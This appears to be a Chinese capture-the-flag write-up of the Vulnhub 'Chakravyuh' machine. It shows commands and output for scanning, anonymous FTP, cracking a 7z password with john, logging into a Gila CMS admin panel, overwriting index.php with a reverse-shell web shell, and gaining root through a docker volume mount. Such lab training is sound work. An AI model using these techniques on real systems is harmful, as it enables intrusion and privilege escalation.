Vulnhub之Chakravyuh详细测试过程
Chakravyuh
识别目标主机IP地址
─(root💀kali)-[~/Vulnhub/chakravyuh]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.136 00:0c:29:c7:63:f1 1 60 VMware, Inc.
192.168.187.254 00:50:56:ef:2f:9e 1 60 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.187.136
NMAP扫描
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# nmap -sS -sV -sC -p- 192.168.187.136 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-12 20:58 EST
Nmap scan report for bogon (192.168.187.136)
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c6:54:93:e8:1c:aa:f7:5f:d0:7d:6e:2e:df:ec:88:69 (RSA)
| 256 d4:b4:2e:96:4e:f7:f6:b7:83:a8:ef:06:6c:80:1d:25 (ECDSA)
|_ 256 66:d0:5b:93:56:c5:7a:2e:60:90:c4:4e:4f:18:5a:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Chakravyuh
|_http-server-header: Apache/2.4.29 (Ubuntu)
65530/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Oct 27 2019 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.187.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:C7:63:F1 (VMware)
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.77 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、65530(FTP)
获得Shell
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# ftp 192.168.187.136 65530
Connected to 192.168.187.136.
220 (vsFTPd 3.0.3)
Name (192.168.187.136:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Oct 27 2019 .
drwxr-xr-x 3 ftp ftp 4096 Oct 27 2019 ..
drwxr-xr-x 2 ftp ftp 4096 Oct 27 2019 pub
226 Directory send OK.
ftp> cd put
550 Failed to change directory.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Oct 27 2019 .
drwxr-xr-x 3 ftp ftp 4096 Oct 27 2019 ..
drwxr-xr-x 2 ftp ftp 4096 Oct 27 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Oct 27 2019 .
drwxr-xr-x 3 ftp ftp 4096 Oct 27 2019 ..
-rw-r--r-- 1 ftp ftp 247 Oct 27 2019 arjun.7z
226 Directory send OK.
ftp> get arjun.7z
local: arjun.7z remote: arjun.7z
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for arjun.7z (247 bytes).
226 Transfer complete.
247 bytes received in 0.00 secs (620.0795 kB/s)
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp>
──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# searchsploit vsFTPd 3.0.3
-------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
-
目标主机允许匿名访问
-
匿名用户不允许上传文件
-
FTP服务没有可利用的漏洞
──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# 7z x arjun.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 247 bytes (1 KiB)
Extracting archive: arjun.7z
Enter password (will not be echoed):
ERROR: arjun.7z
Can not open encrypted archive. Wrong password?
ERRORS:
Headers Error
Can't open as archive: 1
Files: 0
Size: 0
Compressed: 0
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# /usr/share/john/7z2john.pl arjun.7z > hashes 130 ⨯
Can't locate Compress/Raw/Lzma.pm in @INC (you may need to install the Compress::Raw::Lzma module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.34.0 /usr/local/share/perl/5.34.0 /usr/lib/x86_64-linux-gnu/perl5/5.34 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.34 /usr/share/perl/5.34 /usr/local/lib/site_perl) at /usr/share/john/7z2john.pl line 6.
BEGIN failed--compilation aborted at /usr/share/john/7z2john.pl line 6.
一下子还解决不了这个问题,用在线网站将7z压缩文件转换为hash值
http://www.wendanghuifu.com/freetools/7z2john.html
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# cat hashes
$7z$0$19$0$1122$8$6d5c2c86b140c3740000000000000000$1433678760$128$114$c96fd8f58ab9f87f9e21599caa51e9e23cac8b20833942d7d8af8564e82e0520cec2c1e5d40fe5156ce7189926bc39cc7675a77d21610e9e39b04abf781d908112eb0fe6e1d3f25df12bbcad6eaac7c11951e5e8e1fe4154a59b996f07e7ce5257c97756b85c2cbaa1ea9d1823ce3cc9dac5d286d92e6fd1f640f6742d517c4d
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 14 for all loaded hashes
Cost 3 (compression type) is 0 for all loaded hashes
Cost 4 (data length) is 114 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
family (?)
1g 0:00:00:03 DONE (2023-02-12 21:25) 0.2849g/s 22.79p/s 22.79c/s 22.79C/s samantha..family
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到密码为family
──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# ls
arjun.7z hashes nmap_full_scan secret.txt test.txt
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# cat secret.txt
Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d
gila:admin@gmail.com:princesa
不知道这个用户密码是ftp的还是ssh的,先尝试一下ssh,然后ftp
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# ssh gila@192.168.187.136
The authenticity of host '192.168.187.136 (192.168.187.136)' can't be established.
ED25519 key fingerprint is SHA256:6U7JDiDoQOYUilQsV5b5FCkThEvTGNbXPOVulbdmAa0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.187.136' (ED25519) to the list of known hosts.
gila@192.168.187.136's password:
Permission denied, please try again.
gila@192.168.187.136's password:
Permission denied, please try again.
gila@192.168.187.136's password:
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# ftp 192.168.187.136 65530 130 ⨯
Connected to 192.168.187.136.
220 (vsFTPd 3.0.3)
Name (192.168.187.136:root): gila
530 This FTP server is anonymous only.
Login failed.
ftp> exit
221 Goodbye.
既不是ftp也不是ssh的用户名和密码,暂时放在一边。
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# nikto -h http://192.168.187.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.136
+ Target Hostname: 192.168.187.136
+ Target Port: 80
+ Start Time: 2023-02-12 21:30:46 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 3d7, size: 595c1b432ad00, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8067 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-02-12 21:31:54 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
看一下前面得到用户名密码是否可以用于phpmyadmin,没有成功。
──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# searchsploit gila
-------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
Gila CMS 1.11.8 - 'query' SQL Injection | php/webapps/48590.py
Gila CMS 1.9.1 - Cross-Site Scripting | php/webapps/46557.txt
Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) | php/webapps/49412.py
Gila CMS < 1.11.1 - Local File Inclusion | multiple/webapps/47407.txt
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
需要先找到管理员入口,强烈怀疑前面得到的用户名密码就是管理员的相关信息。
目录扫描/gila下级目录,成功得到/admin,登陆管理后台,下一步是将shell.php上传
──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# gobuster dir -u http://192.168.187.136/gila/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.136/gila/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/12 21:38:01 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 3891]
/blog (Status: 200) [Size: 3891]
/about (Status: 200) [Size: 3375]
/search (Status: 200) [Size: 3891]
/1 (Status: 200) [Size: 4141]
/01.txt (Status: 200) [Size: 4141]
/1.php (Status: 200) [Size: 4141]
/01.sh (Status: 200) [Size: 4141]
/1.html (Status: 200) [Size: 4141]
/login (Status: 200) [Size: 1591]
/01 (Status: 200) [Size: 4141]
/1.txt (Status: 200) [Size: 4141]
/01.php (Status: 200) [Size: 4141]
/1.sh (Status: 200) [Size: 4141]
/01.html (Status: 200) [Size: 4141]
/category (Status: 200) [Size: 3902]
/themes (Status: 301) [Size: 335] [--> http://192.168.187.136/gila/themes/?url=themes]
/feed (Status: 200) [Size: 761]
/0 (Status: 200) [Size: 3891]
/admin (Status: 200) [Size: 1591]
/assets (Status: 301) [Size: 335] [--> http://192.168.187.136/gila/assets/?url=assets]
/tag (Status: 200) [Size: 3914]
在content栏中有file manager,上传shell.php成功,文件在assets目录下
但是访问下面的url:
http://192.168.187.136/gila/assets/shell.php
返回forbidden
其实已经更换思路,不是上传文件,而是将index.php代码修改为shell.php代码
┌──(root💀kali)-[~/Vulnhub/chakravyuh]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.136] 39856
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
19:13:02 up 1:20, 0 users, load average: 0.00, 0.11, 1.58
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
www-data@ubuntu:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),116(docker)
www-data@ubuntu:/tmp$
提权
是否可以利用docker进行提权?
www-data@ubuntu:/tmp$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest 965ea09ff2eb 3 years ago 5.55MB
www-data@ubuntu:/tmp$ docker run -v /root:/mnt -it alpine
docker run -v /root:/mnt -it alpine
/ # cd /mnt
cd /mnt
/mnt # ls -alh
ls -alh
total 24K
drwx------ 3 root root 4.0K Oct 28 2019 .
drwxr-xr-x 1 root root 4.0K Feb 13 03:24 ..
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Oct 25 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2.8K Oct 27 2019 final.txt
/mnt # cat final.txt
cat final.txt
,╓,
╢▀╢
╟Ü╡
▓Ü╢
,╓, ,,╓▄▓▓╣▄╓,, ,╓,
║▓╙╣ ╓g▓▓╣╣╣╣╣╣▓╣╣╣╣╣╣▓▓æw ╣╩║▓
"▓╣ß╗,,g▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣▓W,,╥▓▓╢"
▓▌▓▐╣╣╣▓▓▓╩▀' ▓Ü▒ ╙╩▓▓▓╣╣╣▌▓]Ñ
╒▓╣╣▓▓▓▀ /▓W║m ╙▓▓▓╣╣▓╗
φ╣╣╣▓▓╩▓║@╖, ╘▓µ╣╛ ,╓@▓║╜▓▓▓╣╣▓
▓╣╣▓▓▓ ▓U▓╓@ ▓Ü▒ Æ▓▓H╢` ╚▓▓╣╣▓
▓╣╣▓▓▀ ╙▓▓╣╣, ╠Ü║ ,▓▓╢Ñ╜ ╙▓▓╣╣▓
╒╣╣╣▓▓ ╙▓╬▓▓▓║╢╢▓▓▓▓║" ╟▓╣╣╣▌
▓╣╣▓▓ Æ▓║╣▒▄▓▓▄╢╢▓▓ ▓▓╣╣▓
╔▓║╣]¢║╢╟▓▓╣▌╣]║╢╜φ╙╢║║¢U╣▒▒█▓▓▌██▌║Ü╣H¢╬▓▓▓φ▓▓▓¢╢▐╣▓▓▓▓▓@[╣║▓W
"╙╙ '╙▀╝▓╣╣▓╣'╙╙▀Ü▓▀╙└" ▓▓▒╫███▓█▌╢╫╣'`""╙╩∩╝╙"`▓▓╣╣▓╙╜"` ╙╙"
╟╣╣╣▓L ]▓▓║Ñ▒▒╣@╢▓▓L ,▓▓╣╣▓
╣╣╣▓▓ ╓@╣▓"▀▓▓▓▓▓▀"║╣▓╦, ▓▓╣╣╣"
╙╣╣╣▓▓ ╔╟║╠▓╜ ╟Ü▓ ╙╣╢▓▓φ ▓▓╣╣╣▌
╙╣╣╣▓▓╖ g╢▓▓@" ╢Ü╣ V╢║▓▓ ╓▓▓╣╣╣▀
"▓╣╣▓▓▓@▀ ╙╠▓▓$ ╙▒▓▓▓╣╣▓┘
║▓▓╣▓▓▓&╖ ╣Ü╣` ,φ▓▓▓╣▓▓▓r
,╣╠▓Ç▓╣╣╣▓▓▓▓&æ╖,,║Ü▓,,╓g&▓▓▓▓╣╣╣▓Ü╢║▓ç
,@N╠╝" ╙▓▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣╣▓▀ `╨╣╝@,
▓▓║╜ "▀▀▓▓╣╣▓▓▓╣╣▓▓▀▀╙ ╙╣▓▓
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Kavish Tyagi : https://twitter.com/Tyagi_kavish_
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________
/mnt #
提权成功,并成功拿到root flag
经验教训
-
对于CMS,拿到管理员用户名和密码后,下一步的工作就是获得Shell
-
对于wordpress,可以替换比如404.php模板,但对于其他的CMS,修改当前已经存在的php文件,比如本靶机里的index.php,否则存在“即使上传成功,但无法访问的问题”
STRIVE FOR PROGRESS,NOT FOR PERFECTION
